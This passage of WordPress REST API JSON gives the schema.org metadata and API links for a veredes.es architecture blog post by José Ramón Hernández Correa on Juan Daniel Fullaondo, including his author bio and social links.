Vel\u00e1zquez"},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/eefca3204fa5a4349162c2869bee6c49","name":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","caption":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa"},"description":"Nac\u00ed en 1960. Arquitecto por la ETSAM, 1985. Doctor Arquitecto por la Universidad Polit\u00e9cnica de Madrid, 1992. Soy, en el buen sentido de la palabra, bueno. Ahora estoy algo cansado, pero sigo atento y curioso. Arquitecto, bloguero, saxofonero, escritor... pero todo mal.","sameAs":["http:\/\/arquitectamoslocos.blogspot.com.es\/","https:\/\/www.facebook.com\/joseramon.hernandezcorrea","https:\/\/www.instagram.com\/arquitectamoslocos\/","https:\/\/www.linkedin.com\/in\/jos-ramn-hernndez-correa-b6378b2a\/","https:\/\/x.com\/https:\/\/twitter.com\/arquitectamos"],"url":"https:\/\/veredes.es\/blog\/author\/arquitectamos\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/27878","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/33"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=27878"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/27878\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/45465"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=27878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=27878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=27878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}